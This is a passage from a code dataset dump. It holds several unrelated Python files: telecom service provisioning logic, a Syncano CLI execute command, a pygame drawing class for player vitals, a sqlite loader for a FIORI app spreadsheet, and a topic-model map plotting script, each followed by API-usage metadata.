"keras.utils.np_utils.to_categorical", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.layers.Permute", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.layers.Reshape", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.backend.mean", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 30, "usage_type": "name"}, {"api_name": "keras.layers.Permute", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.layers.multiply", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 37, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "44520716", "text": "# Python imports\nimport logging\n\n# ONSA imports\nfrom charles.utils.utils import *\nfrom charles.utils.inventory_utils import *\nfrom charles.utils.ipam_utils import *\nfrom charles.constants import *\nfrom charles.models import *\n\n\ndef deleted_automated_request(service):\n logging.debug(\"deleted_automated_request\")\n client = get_client(service['client_id'])\n service_data = {}\n\n try:\n parameters = an_parameters(client, service)\n config = {\n \"client\": client['name'],\n \"service_type\": service['service_type'],\n \"service_id\": service['service_id'],\n \"op_type\": \"DELETE\"}\n\n config['parameters'] = {\n \"service_vlan\": service['vlan_id'],\n \"an_client_port\": parameters['an_client_port'],\n \"an_uplink_ports\": parameters['an_uplink_ports'],\n \"access_port_services\":parameters['access_port_services']\n }\n config['devices'] = [{\"vendor\": parameters['vendor'],\n \"model\": parameters['model'], \"mgmt_ip\": parameters['mgmt_ip']}]\n\n service_state = DELETEINPROGRESS_SERVICE_STATE\n\n logging.debug(f'releasing service resources for service {service}')\n if service['public_network']:\n destroy_subnet(client['name'], service['service_id'])\n if service['wan_network']:\n destroy_subnet(client['name'], service['service_id'])\n release_access_port(service['access_port_id'])\n release_vlan(service['access_node_id'], service['vlan_id'])\n logging.debug(\"deleting service\")\n\n #Send message(job) to Queue so workers can take it\n configure_service(config) \n except BaseException as e:\n logging.error(e)\n service_state = DELETEERROR_SERVICE_STATE\n\n service_data['service_state'] = service_state\n update_jeangrey_service(service['service_id'], service_data)\n service = update_charles_service(service, service_state)\n return service\n\n\ndef an_activated_automated_request(service):\n logging.debug(\"an_activated_automated_request\")\n client = get_client(service['client_id'])\n service_data = {}\n\n try:\n parameters = an_parameters(client, service)\n config = {\n \"client\": client['name'],\n \"service_type\": service['service_type'],\n \"service_id\": service['service_id'],\n \"op_type\": \"CREATE\"}\n\n backbone_parameters = bb_parameters(client, service)\n\n config['parameters'] = {\n \"service_vlan\": service['vlan_id'],\n \"an_client_port\": parameters['an_client_port'],\n \"an_uplink_ports\": parameters['an_uplink_ports'],\n \"access_port_services\":parameters['access_port_services']\n }\n config['devices'] = [{\"vendor\": parameters['vendor'],\n \"model\": parameters['model'], \"mgmt_ip\": parameters['mgmt_ip']}]\n\n service_state = \"an_activation_in_progress\"\n logging.debug(\"configuring service\")\n \n #Send message(job) to Queue so workers can take it\n configure_service(config) \n except BaseException:\n service_state = \"ERROR\"\n destroy_subnet(client['name'], service['service_id'])\n\n service_data['service_state'] = service_state\n service_data['public_network'] = backbone_parameters['public_network']\n service_data['wan_network'] = backbone_parameters['wan_network']\n update_jeangrey_service(service['service_id'], service_data)\n service = update_charles_service(service, service_state)\n return service\n\ndef an_parameters(client, service):\n try:\n access_port = get_access_port(service['access_port_id'])\n access_node = get_access_node(service['access_node_id'])\n an_device_model = get_device_model(access_node['device_model_id'])\n access_port_services = get_access_port_services(service['access_port_id'])\n\n services = \"\"\n for my_service in access_port_services:\n if my_service['id'] is not service['service_id']:\n services+= str(my_service['id']) + \"-\"\n services += str(service['service_id'])\n\n parameters = { 'provider_vlan': access_node['provider_vlan'],\n 'an_client_port': access_port['port'],\n 'an_uplink_ports': access_node['uplink_ports'],\n 'mgmt_ip': access_node['mgmt_ip'],\n 'model': an_device_model['model'],\n 'vendor': an_device_model['brand'],\n 'access_port_services': services }\n\n logging.debug(f'parameters: {parameters}')\n\n return parameters\n except BaseException:\n logging.error(\"Unable to fetch parameters\")\n raise InvalidParametersException(\"Unable to fetch parameters\")\n\n # service_data = {}\n\n\n\ndef bb_parameters(client, service):\n try:\n location = get_location(service['location_id'])\n logging.debug(f'location: {location}')\n\n router_node = get_router_node(service['router_node_id'])\n logging.debug(f'router_node: {router_node}')\n\n rn_device_model = get_device_model(router_node['device_model_id'])\n \n logging.debug(f'looking network with prefix {service[\"prefix\"]} for service ID {service[\"service_id\"]} client {client[\"name\"]}')\n public_network = assign_network(client['name'], service['service_id'],IPAM_PUBLIC_NETWORK,service['prefix'])\n logging.debug(f'network: {public_network}')\n wan_network = assign_network(client['name'], service['service_id'],IPAM_MGMT_WAN,IPAM_MGMT_WANPREFIX)\n logging.debug(f'network: {wan_network}')\n\n parameters = {\n 'pop_size': location['pop_size'],\n 'public_network' : public_network,\n 'wan_network' : wan_network\n }\n\n parameters['router_node'] = { 'vendor': rn_device_model['brand'],\n 'model': rn_device_model['model'],\n 'mgmt_ip': router_node['mgmt_ip']\n }\n\n logging.debug(f'parameters: {parameters}')\n return parameters\n except BaseException:\n logging.error(\"Unable to fetch parameters\")\n raise InvalidParametersException(\"Unable to fetch parameters\")\n\n\n # \"\"\"\n # Fetch logical units\n # \"\"\"\n # if service['logical_unit_id'] is None:\n # free_logical_units = get_free_logical_units(router_node['id'])\n # if free_logical_units is None:\n # logging.warning('No available logical units')\n # parameters['status'] = ERR_NO_LOGICALUNITS\n # return parameters\n # else:\n # logical_unit_id = free_logical_units[0]['id']\n # client_network = get_client_network(client['name'], service['id'], service['prefix'])\n # if client_network:\n # add_logical_unit_to_router_node(router_node['id'], logical_unit_id, service['id'])\n # else:\n # logging.warning('No public networks available')\n # parameters['status'] = ERR_NO_PUBLICNETWORKS\n # return parameters\n\n # wan_network = get_wan_mpls_network(location['name'], client['name'], service['id'])\n\n # else:\n # logical_unit_id = service['logical_unit_id']\n # client_network = service['public_network']\n # wan_network = service['wan_network']\n\n\n\ndef bb_data_ack_automated_request(service):\n # if DEBUG: print(\"bb_data_ack_automated_request\")\n # client = get_client(service['client_id'])\n # parameters = bb_parameters(client, service)\n\n # if DEBUG: print(parameters)\n\n # #Handle parameters ERROR\n # if parameters is not None:\n # service_data = { 'logical_unit_id': parameters['logical_unit_id'],\n # 'wan_network': parameters['wan_network']\n # }\n # service_data['public_network'] = parameters['client_network']\n # service_state = \"bb_data_ack\"\n\n # else:\n # service_data = {}\n # service_state = \"ERROR\"\n\n # service_data['service_state']=service_state\n # update_jeangrey_service(service['service_id'], service_data)\n # service = update_charles_service(service, service_state)\n # service.update(service_data)\n # my_service = service\n # return my_service\n pass\n\n\ndef bb_activated_automated_request(service):\n # if DEBUG: print(\"bb_activated_automated_request\")\n # client = get_client(service['client_id'])\n # parameters = bb_parameters(client, service)\n\n # config = {\n # \"client\" : client['name'],\n # \"service_type\" : service['service_type'],\n # \"service_id\" : service['service_id'],\n # \"op_type\" : \"CREATE\" }\n\n # config['parameters'] = {\n # \"pop_size\" : parameters['pop_size'], \n # \"an_uplink_interface\" : parameters['an_uplink_interface'],\n # \"an_uplink_ports\" : parameters['an_uplink_ports'],\n # \"logical_unit\" : parameters['logical_unit_id'], \n # \"provider_vlan\" : parameters['provider_vlan'], \n # \"service_vlan\" : service['vlan_id'], \n # \"an_client_port\" : parameters['an_client_port'],\n # \"wan_cidr\": service['wan_network'],\n # \"client_cidr\": service['public_network']\n # }\n\n # config['devices'] = [{\"vendor\": parameters['router_node']['vendor'],\"model\": parameters['router_node']['model'],\"mgmt_ip\": parameters['router_node']['mgmt_ip']}]\n\n # configure_service(config)\n # # service_data = {}\n # # service_data['service_state'] = \"bb_activation_in_progress\"\n # service_state = \"bb_activation_in_progress\"\n # service_data = {'service_state' : service_state}\n # update_jeangrey_service(service['service_id'], service_data)\n # service = update_charles_service(service, service_state)\n\n # return service\n pass\n\ndef an_data_ack_automated_request(service):\n # if DEBUG: print(\"an_data_ack_automated_request\")\n # # service_data = {}\n # # service_data['service_state'] = \"an_data_ack\"\n # service_state = \"an_data_ack\"\n # service_data = {'service_state' : service_state}\n # update_jeangrey_service(service['service_id'], service_data)\n # service = update_charles_service(service, service_state)\n # return service\n pass\n\n\ndef cpe_data_ack_automated_request(service):\n # if DEBUG: print(\"cpe_data_ack_automated_request\")\n # client = get_client(service['client_id'])\n # parameters = cpe_parameters(client, service)\n # customer_location = get_customer_location(service['client_id'], service['customer_location_id'])\n\n # if parameters['client_port_id']:\n # service_data = { \"client_port_id\": parameters['client_port_id']}\n\n # service_state = \"cpe_data_ack\"\n\n # service_data['service_state']=service_state\n # update_jeangrey_service(service['service_id'], service_data)\n # service = update_charles_service(service, service_state) \n # service.update(service_data)\n # return service\n pass\n\ndef service_activated_automated_request(service):\n # if DEBUG: print(\"service_activated_automated_request\")\n # client = get_client(service['client_id'])\n # parameters = cpe_parameters(client, service)\n # config = {\n # \"client\" : client['name'],\n # \"service_type\" : service['service_type'],\n # \"service_id\" : service['service_id'],\n # \"op_type\" : \"CREATE\" }\n\n # service_data = {}\n\n # if parameters is not None:\n # config['parameters'] = { \n # \"service_vlan\" : service['vlan_id'], \n # \"bandwidth\" : service['bandwidth'],\n # \"on_client_port\" : parameters['client_node']['interface_name'],\n # \"on_uplink_port\" : parameters['client_node']['uplink_port'],\n # \"wan_cidr\": service['wan_network'],\n # \"client_cidr\": service['public_network']\n # }\n\n # config['devices'] = [{\"vendor\": parameters['client_node']['vendor'], \"model\": parameters['client_node']['model'], \"mgmt_ip\": parameters['client_node']['mgmt_ip']}]\n\n\n # service_state = \"cpe_activation_in_progress\"\n # configure_service(config)\n # else:\n # service_state = \"ERROR\"\n\n # service_data['service_state'] = service_state\n # update_jeangrey_service(service['service_id'], service_data)\n # service = update_charles_service(service, service_state) \n # return service\n pass\n\n\ndef cpe_parameters(client, service):\n pass \n # location = get_location(service['location_id'])\n # client_node = get_client_node(service['client_node_sn'])\n # parameters = {}\n \n # if service['client_port_id'] is None:\n # customer_location = get_customer_location(client['id'],service['customer_location_id'])\n # client_port_id = fetch_cpe_port_id(service['client_node_sn'], client['name'], customer_location) \n # client_port = get_client_port(service['client_node_sn'], client_port_id)\n # parameters['client_port_id'] = client_port_id\n\n # else:\n # client_port = get_client_port(service['client_node_sn'], service['client_port_id'])\n\n # parameters['client_node'] = { 'vendor': client_node['vendor'],\n # 'model': client_node['model'],\n # 'mgmt_ip': client_node['mgmt_ip'],\n # 'interface_name': client_port['interface_name'],\n # 'wan_network': service['wan_network'],\n # 'uplink_port' : client_node['uplink_port']\n # }\n\n # return parameters", "sub_path": "charles/charles/services/cpe_irs_service.py", "file_name": "cpe_irs_service.py", "file_ext": "py", "file_size_in_byte": 13168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.debug", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 48, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 82, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 118, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 132, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 135, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 139, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 141, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 143, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 156, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "250340943", "text": "# -*- coding: utf-8 -*-\nimport json\nimport sys\nfrom ConfigParser import NoOptionError\n\nimport click\nfrom syncano.exceptions import SyncanoDoesNotExist\nfrom syncano_cli.base.connection import create_connection, get_instance_name\nfrom syncano_cli.config import ACCOUNT_CONFIG_PATH\n\nfrom .utils import print_response\n\n\n@click.group()\ndef top_execute():\n pass\n\n\n@top_execute.command()\n@click.option('--config', help=u'Account configuration file.')\n@click.option('--instance-name', help=u'Instance name.')\n@click.argument('script_endpoint_name')\n@click.option('--payload', help=u'Script payload in JSON format.')\ndef execute(config, instance_name, script_endpoint_name, payload):\n \"\"\"\n Execute script endpoint in given instance\n \"\"\"\n config = config or ACCOUNT_CONFIG_PATH\n instance_name = get_instance_name(config, instance_name)\n try:\n connection = create_connection(config)\n instance = connection.Instance.please.get(instance_name)\n se = instance.script_endpoints.get(instance_name, script_endpoint_name)\n data = json.loads((payload or '').strip() or '{}')\n response = se.run(**data)\n print_response(response)\n except NoOptionError:\n click.echo(u'ERROR: Do a login first: syncano login.')\n sys.exit(1)\n except SyncanoDoesNotExist as e:\n click.echo(u'ERROR: {}'.format(e))\n sys.exit(1)\n except ValueError as e:\n click.echo(u'ERROR: Invalid payload format: {error}'.format(error=e))\n sys.exit(1)\n", "sub_path": "syncano_cli/execute/commands.py", "file_name": "commands.py", "file_ext": "py", "file_size_in_byte": 1506, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "click.group", "line_number": 14, "usage_type": "call"}, {"api_name": "syncano_cli.config.ACCOUNT_CONFIG_PATH", "line_number": 28, "usage_type": "name"}, {"api_name": "syncano_cli.base.connection.get_instance_name", "line_number": 29, "usage_type": "call"}, {"api_name": "syncano_cli.base.connection.create_connection", "line_number": 31, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.print_response", "line_number": 36, "usage_type": "call"}, {"api_name": "ConfigParser.NoOptionError", "line_number": 37, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 39, "usage_type": "call"}, {"api_name": "syncano.exceptions.SyncanoDoesNotExist", "line_number": 40, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 42, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 45, "usage_type": "call"}, {"api_name": "click.option", "line_number": 20, "usage_type": "call"}, {"api_name": "click.option", "line_number": 21, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 22, "usage_type": "call"}, {"api_name": "click.option", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "589496372", "text": "import pygame\nfrom pygame.locals import *\n\n#Pygame draw class. Draws the different sections to the pygame screen. DrawStringData draws readable data.\n#DrawGraph draws the graph. DrawPosition draws the position.\nclass DrawPlayer():\n\tdef __init__(self, surface, start_xPos, start_yPos):\n\t\tself.surface = surface\n\t\tself.start_xPos = start_xPos\n\t\tself.start_yPos = start_yPos\n\t\t\n\t\tself.number = 0\n\t\tself.hearth = 0\n\t\tself.breath = 0\n\t\tself.position = 0\n\t\tself.hearthGraph = []\n\t\tself.breathGraph = []\n\t\tself.positionCircle = 0\n\t\t\n\tdef drawBox(self):\n\t\tpygame.draw.line(self.surface, pygame.Color(155,155,155), (self.start_xPos, self.start_yPos), (self.start_xPos+500, self.start_yPos))\n\t\tpygame.draw.line(self.surface, pygame.Color(155,155,155), (self.start_xPos, self.start_yPos+100), (self.start_xPos+500, self.start_yPos+100))\n\t\tpygame.draw.line(self.surface, pygame.Color(155,155,155), (self.start_xPos, self.start_yPos), (self.start_xPos+100, self.start_yPos))\n\t\tpygame.draw.line(self.surface, pygame.Color(155,155,155), (self.start_xPos+500, self.start_yPos), (self.start_xPos+500, self.start_yPos+100))\n\t\tpygame.draw.line(self.surface, pygame.Color(155,155,155), (self.start_xPos+250, self.start_yPos), (self.start_xPos+250, self.start_yPos+100))\n\t\t\n\tdef drawStringData(self, name, hearth, breath, xPos, yPos):\n\t\tpygame.font.init()\n\t\tfont = pygame.font.SysFont('Calibri', 15)\n\t\tself.number = font.render('#'+str(name), False, (0, 0, 0))\n\t\tself.surface.blit(self.number, (0, self.start_yPos))\n\t\t\n\t\tself.position = font.render('xPos:'+str(xPos)+\", yPos:\"+str(yPos), False, (0, 0, 0))\n\t\tself.surface.blit(self.position, (0, self.start_yPos+25))\n\t\t\n\t\tself.hearth = font.render('Current Heart:'+str(hearth), False, (255, 0, 0))\n\t\tself.surface.blit(self.hearth, (0, self.start_yPos+50))\n\t\t\n\t\tself.breath = font.render('Current Breath:'+str(breath), False, (0, 0, 255))\n\t\tself.surface.blit(self.breath, (0, self.start_yPos+75))\n\t\t\n\tdef drawGraph(self, hearthList, breathList):\n\t\tpygame.draw.line(self.surface, pygame.Color(0, 0,0), (self.start_xPos+250+250, self.start_yPos), (self.start_xPos+250+250, self.start_yPos+100))\n\t\t\n\t\ti = 0\n\t\tprev_value = 0\n\t\tfor value in hearthList:\n\t\t\tif prev_value:\n\t\t\t\tpygame.draw.line(self.surface, pygame.Color(255, 0,0), (self.start_xPos+250+250-i, self.start_yPos+100-prev_value/2), (self.start_xPos+250+250-i-1, self.start_yPos+100-value/2))\n\t\t\tprev_value = value\n\t\t\ti = i + 1\n\t\t\n\t\ti = 0\n\t\tprev_value = 0\n\t\tfor value in breathList:\n\t\t\tif prev_value:\n\t\t\t\tpygame.draw.line(self.surface, pygame.Color(0, 0,255), (self.start_xPos+250+250-i, self.start_yPos+100-prev_value/2), (self.start_xPos+250+250-i-1, self.start_yPos+100-value/2))\n\t\t\tprev_value = value\n\t\t\ti = i + 1\n\t\t\n\tdef drawPosition(self, xPos, yPos, name):\n\t\t#Limits the positions inside bounds.\n\t\txPos = xPos + 1 #These two maps (0,0) to \"1,1\" on screen in a 5x5m square\n\t\tyPos = yPos + 1\n\t\tif xPos <= 0:\n\t\t\txPos = 0\n\t\telif xPos >= 5:\n\t\t\txPos = 5\n\t\tif yPos <= 0:\n\t\t\tyPos = 0\n\t\telif yPos >= 5:\n\t\t\tyPos = 5\n\t\t#Maps real life meters into pixels on the screen.\n\t\txPos = int((xPos)*250/5) + 500 #Change these if neccessary.\n\t\tyPos = int((yPos)*250/5)\n\t\tcenter = [xPos, yPos]\n\t\tself.positionCircle = pygame.draw.circle(self.surface, (255, 255, 0), center, 10)\n\t\t\n\t\tpygame.font.init()\n\t\tfont = pygame.font.SysFont('Calibri', 15)\n\t\tself.number = font.render(str(name), False, (0, 0, 0))\n\t\tself.surface.blit(self.number, (xPos-4, yPos-7))\n\t\t", "sub_path": "src/ui/drawplayer.py", "file_name": "drawplayer.py", "file_ext": "py", "file_size_in_byte": 3422, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.draw.line", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.font.init", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.draw.circle", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "525344208", "text": "import sqlite3\r\nimport pandas as pd\r\nfilename = \"FIORIBOM\"\r\n\r\n# con = sqlite3.connect(filename+\".db\")\r\ncon = sqlite3.connect(\"fbomdb.sqlite\")\r\n#\r\n# CREATE/APPEND TABLE FIORIBOM - NAME SAME AS EXCEL AND SHEET, ACCEPTS XLSX\r\nwb = pd.read_excel(filename+'.xlsx', sheet_name=None)\r\nfor sheet in wb:\r\n wb[sheet].to_sql(sheet, con, index=False, if_exists='append')\r\n #\r\n# GET LENGTH OF TABLE\r\ncur = con.cursor()\r\ncur.execute(\"SELECT * FROM FIORIBOM\")\r\nrows = cur.fetchall()\r\nprint(len(rows))\r\n#\r\n# # GET LENGTH OF TABLE\r\ndef get_release():\r\n con = sqlite3.connect(\"fbomdb.sqlite\")\r\n cur = con.cursor()\r\n cur.execute(\"SELECT DISTINCT ReleaseName FROM FIORIBOM ORDER BY ReleaseName DESC\")\r\n rows = cur.fetchall()\r\n # print(len(rows))\r\n releases = list()\r\n for row in rows:\r\n if(('Wave' not in str(row[0])) and ('SFIN' not in str(row[0]))):\r\n # print(row[0])\r\n releases.append(row[0])\r\n con.commit()\r\n con.close()\r\n return releases\r\n\r\ndef get_app_details(release, app_list):\r\n con = sqlite3.connect(\"fbomdb.sqlite\")\r\n cur = con.cursor()\r\n app_details = list()\r\n for app in app_list:\r\n # print(app)\r\n if (app[2] == 'NGUI'):\r\n # app_query = \"\"\"SELECT P3Area, FioriID, AppName, AppType, ApplicationComponent, FormFactors, BusinessRoleName, PrimaryODataServiceName FROM FIORIBOM WHERE ReleaseName = '\"\"\" + release + \"\"\"', SemanticObject = '\"\"\" + app[0] + \"\"\"', SemanticAction = '\"\"\" + app[1] + \"\"\"'\"\"\"\r\n app_query = \"SELECT P3Area,\\\r\n PO,\\\r\n PortfolioCategory,\\\r\n FioriID,\\\r\n AppName,\\\r\n AppType,\\\r\n UITechnology,\\\r\n DeliveryModel,\\\r\n ApplicationComponent,\\\r\n AppDocumentationLink,\\\r\n FormFactors,\\\r\n BusinessRoleName,\\\r\n BusinessCatalogName,\\\r\n PrimaryODataServiceName,\\\r\n AdditionalODataServices,\\\r\n 'Development:_Product_Owner',\\\r\n 'Development:_Vice_President',\\\r\n 'Development:_Component_Owner',\\\r\n 'Development:_Delivery_Manager',\\\r\n 'IMS:_Main_Manager_Responsible',\\\r\n 'IMS:_VP_Director' FROM FIORIBOM WHERE ReleaseName = '%s' AND SemanticObject = '%s' AND SemanticAction = '%s'\" % (release, app[0], app[1])\r\n # print(app_query)\r\n cur.execute(app_query)\r\n fetched_data = cur.fetchone()\r\n if fetched_data is not None:\r\n app_details.append(fetched_data)\r\n # print(app_details)\r\n con.commit()\r\n con.close()\r\n # print(app_details)\r\n return app_details\r\n# channel = SelectField('Channel',choices=a,)\r\n\r\n# cur = con.cursor()\r\n# cur.execute(\"DROP TABLE FIORIBOM\")\r\n\r\n# DELETE ALL ENTRIES FROM TABLE\r\n# cur = con.cursor()\r\n# cur.execute(\"DELETE FROM FIORIBOM\")\r\n# rows = cur.fetchall()\r\n# print(len(rows))\r\n\r\n# cur = con.cursor()\r\n# cur.execute(\"SELECT * FROM FIORIBOM WHERE ReleaseName = 'S/4HANA 1511'\")\r\n# rows = cur.fetchall()\r\n# print(len(rows))\r\n\r\n# cur = con.cursor()\r\n# cur.execute(\"SELECT AppName, AppType FROM FIORIBOM WHERE ReleaseName = 'S/4HANA 1511' AND SemanticObject = 'Project' AND SemanticAction = 'analyzePlanActual'\")\r\n# rows = cur.fetchall()\r\n# for row in rows:\r\n# print(row[0])\r\n# print(row[1])\r\n\r\n# AppName = cur.fetchone()[0]\r\n# print(AppName)\r\n# AppType = cur.fetchone()[1]\r\n# print(AppType)\r\n\r\n# if cur.getCount() > 0:\r\n# cur.moveToFirst()\r\n# AppName = cur.getString(cur.getColumnIndex(\"AppName\"));\r\n# print(AppName)\r\n\r\n\r\n\r\ncon.commit()\r\ncon.close()\r\n", "sub_path": "fbomtodb.py", "file_name": "fbomtodb.py", "file_ext": "py", "file_size_in_byte": 3993, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "223867870", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 25 18:00:23 2016\n\n@author: limeng\n\n\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.colors import LinearSegmentedColormap\n\nDMR_STATE = 'output/dmr.state'\nDMR_PARAMETER = 'output/dmr.parameters'\nDMR_FEATURES = 'output/features.txt'\n\nTOPIC_K = 8\n\n# 读出每个词对应的主题内容\n# {doc: {word : topic}}\nword_topic_mapping = dict()\nwith open(DMR_STATE, 'r') as f:\n next(f)\n for line in f:\n record = line.split()\n idx = record[0]\n if idx not in word_topic_mapping:\n word_topic_mapping[idx] = dict()\n word_topic_mapping[idx][record[-2]] = int(record[-1])\n\nprint('Extract topic for each word ...')\n\n# 统计不同位置主题出现的频率\n# {position : {topic : cnt}}\nposition_topic_mapping = dict()\nwith open(DMR_FEATURES, 'r') as f:\n for idx, line in enumerate(f):\n position = line.split()[0]\n if position not in position_topic_mapping:\n topic_list = np.zeros(TOPIC_K)\n \n # 对于每个文档,计算主题分布,并累加到对应的位置上\n parr = np.zeros(TOPIC_K)\n if str(idx) not in word_topic_mapping:\n continue\n for word, word_topic in word_topic_mapping[str(idx)].items():\n parr[word_topic] += 1\n parr = parr / np.sum(parr)\n topic_list = topic_list + parr\n position_topic_mapping[position] = topic_list\n\nprint('Topic for each position ...')\n\n# 归一化\ntmp_map = dict()\nfor loc, topic in position_topic_mapping.items():\n tmp_map[loc] = topic / np.sum(topic)\n \nposition_topic_mapping = tmp_map\nprint('Normalization ...')\n\n# 对于所有的地理位置,以中心地点为标记绘制指定主题的热图\nfor topic_num in range(TOPIC_K):\n # m = Basemap(projection='ortho',lon_0=0,lat_0=0,resolution='l',\\\n # llcrnrx=-1000*1000,llcrnry=-1000*1000,\n # urcrnrx=+1150*1000,urcrnry=+1700*1000)\n \n print(\"Plotting for topic: \", topic_num)\n m = Basemap(llcrnrlon=-180,llcrnrlat=-80,\n urcrnrlon=180,urcrnrlat=80,projection='mill')\n m.drawcoastlines()\n m.drawcountries()\n # m.drawstates()\n \n lon_bins = np.linspace(-180, 180, 72) # 36 bins\n lat_bins = np.linspace(-80, 80, 36) # 72 bins\n density = np.zeros([36, 72])\n \n for x, y in np.ndindex(density.shape):\n loc_str = 'lbloc_' + str(x) + '_' + str(y)\n if loc_str not in position_topic_mapping:\n continue\n density[x][y] = position_topic_mapping[loc_str][topic_num]\n \n lon_bins_2d, lat_bins_2d = np.meshgrid(lon_bins, lat_bins)\n xs, ys = m(lon_bins_2d, lat_bins_2d) # will be plotted using pcolormesh\n \n cdict = {'red': ( (0.0, 1.0, 1.0),\n (1.0, 0.9, 1.0) ),\n 'green':( (0.0, 1.0, 1.0),\n (1.0, 0.03, 0.0) ),\n 'blue': ( (0.0, 1.0, 1.0),\n (1.0, 0.16, 0.0) ) }\n custom_map = LinearSegmentedColormap('custom_map', cdict)\n plt.register_cmap(cmap=custom_map)\n \n plt.pcolormesh(xs, ys, density, cmap=\"custom_map\")\n plt.show()\n # xs.shape = (72, 36)\n # ys.shape = (72, 36)\n\n", "sub_path": "dmr/plot_location.py", "file_name": "plot_location.py", "file_ext": "py", "file_size_in_byte": 3249, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 50, "usage_type": "call"}, {"api_name": 